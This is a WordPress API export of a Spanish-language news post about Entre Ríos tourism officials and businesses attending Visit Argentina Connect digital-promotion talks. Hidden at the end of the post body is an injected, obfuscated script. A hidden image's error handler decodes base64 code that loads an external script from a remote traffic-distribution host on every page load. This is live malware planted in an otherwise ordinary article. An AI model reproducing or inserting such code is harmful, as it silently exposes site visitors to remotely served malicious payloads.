{"id":8710,"date":"2024-09-20T11:01:53","date_gmt":"2024-09-20T14:01:53","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8710"},"modified":"2025-08-13T15:38:21","modified_gmt":"2025-08-13T18:38:21","slug":"entre-rios-apunta-a-fortalecer-al-sector-turistico-con-conexiones-estrategicas","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8710","title":{"rendered":"Entre R\u00edos apunta a fortalecer al sector tur\u00edstico con conexiones estrat\u00e9gicas"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-6ff4f97e346e8504d945bd1b22ccf167\" style=\"background-color:#066da9\"><em>La iniciativa Visit Argentina Connect reuni\u00f3 en la capital provincial a referentes de organismos p\u00fablicos y privados del sector tur\u00edstico entrerriano.<\/em><\/h3>\n\n\n\n<p>El pasado martes, en el Centro Provincial de Convenciones (CPC), se present\u00f3 el ciclo de charlas&nbsp;\u201cEstrategias de Comunicaci\u00f3n en Entornos Digitales y Promoci\u00f3n Tur\u00edstica\u201d que forma parte de&nbsp;la iniciativa Visit Argentina Connect del Instituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR)&nbsp;dirigida a profesionales del sector tur\u00edstico, tanto del \u00e1mbito p\u00fablico como privado, con el&nbsp;objetivo de proporcionar herramientas y estrategias para potenciar el posicionamiento en&nbsp;mercados nacionales e internacionales.<\/p>\n\n\n\n<p>La actividad se enmarca en el programa de acciones impulsado por la Secretar\u00eda de Turismo de&nbsp;Entre R\u00edos y la necesaria formaci\u00f3n de los organismos y empresarios tur\u00edsticos entrerrianos&nbsp;para maximizar sus posibilidades de establecer contactos estrat\u00e9gicos, cerrar negocios y&nbsp;posicionar sus ofertas en el mercado.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8713\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-1024x683.jpg\" alt=\"\" class=\"wp-image-8713\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/71f60e2e79056dab1b3911912a20c5c6.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8712\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-1024x683.jpg\" alt=\"\" class=\"wp-image-8712\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/7df56a1f2f84b83590e1262ca057b15c.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8711\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-1024x683.jpg\" alt=\"\" class=\"wp-image-8711\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/fc5cf0e9bab49640a24db2da81247de1.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Por la Secretar\u00eda de Turismo de Entre R\u00edos estuvieron presentes el director General, Sebasti\u00e1n&nbsp;Bel; la directora de Desarrollo de Gesti\u00f3n, Paula Dur\u00e1n; el director de Promoci\u00f3n Tur\u00edstica,&nbsp;Rodrigo Castro, as\u00ed como personal t\u00e9cnico y profesional. Destinos entrerrianos como Col\u00f3n,&nbsp;San Jos\u00e9, Chajar\u00ed, Santa Elena, La Paz, Victoria, Paran\u00e1, San Benito, participaron del encuentro&nbsp;con representantes de los espacios municipales de Turismo, as\u00ed como con emprendedores de&nbsp;los rubros hoteler\u00eda, servicios y agencias de viajes. Tambi\u00e9n aprovecharon la oportunidad,&nbsp;referentes de la Asociaci\u00f3n Santafesina y Entrerriana de Agencias de Viajes y Turismo&nbsp;(ASEAVyT) y del Bur\u00f3 de Convenciones de Paran\u00e1.<\/p>\n\n\n\n<p>Las herramientas adquiridas permitir\u00e1n, en una primera instancia, participar con mayores\u00a0posibilidades en las rondas de negocios que impulsa la Feria Internacional de Turismo (FIT) y\u00a0donde se re\u00fanen los principales profesionales del sector.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><a href=\"https:\/\/www.entrerios.tur.ar\/noticia\/479\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"414\" height=\"98\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/05\/Captura-de-pantalla_23-5-2024_102517_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-8261\" style=\"width:342px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/05\/Captura-de-pantalla_23-5-2024_102517_www.entrerios.tur_.ar_.jpeg 414w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/05\/Captura-de-pantalla_23-5-2024_102517_www.entrerios.tur_.ar_-300x71.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/05\/Captura-de-pantalla_23-5-2024_102517_www.entrerios.tur_.ar_-320x76.jpeg 320w\" sizes=\"(max-width: 414px) 100vw, 414px\" \/><\/a><\/figure>\n<\/div><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La iniciativa Visit Argentina Connect reuni\u00f3 en la capital provincial a referentes de organismos p\u00fablicos y privados del sector tur\u00edstico entrerriano. El pasado martes, en el Centro Provincial de Convenciones (CPC), se present\u00f3 el ciclo de charlas&nbsp;\u201cEstrategias de Comunicaci\u00f3n en Entornos Digitales y Promoci\u00f3n Tur\u00edstica\u201d que forma parte de&nbsp;la iniciativa Visit Argentina Connect del Instituto [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8711,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,30],"tags":[],"class_list":["post-8710","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pampeana","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8710","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8710"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8710\/revisions"}],"predecessor-version":[{"id":10079,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8710\/revisions\/10079"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8711"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8710"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}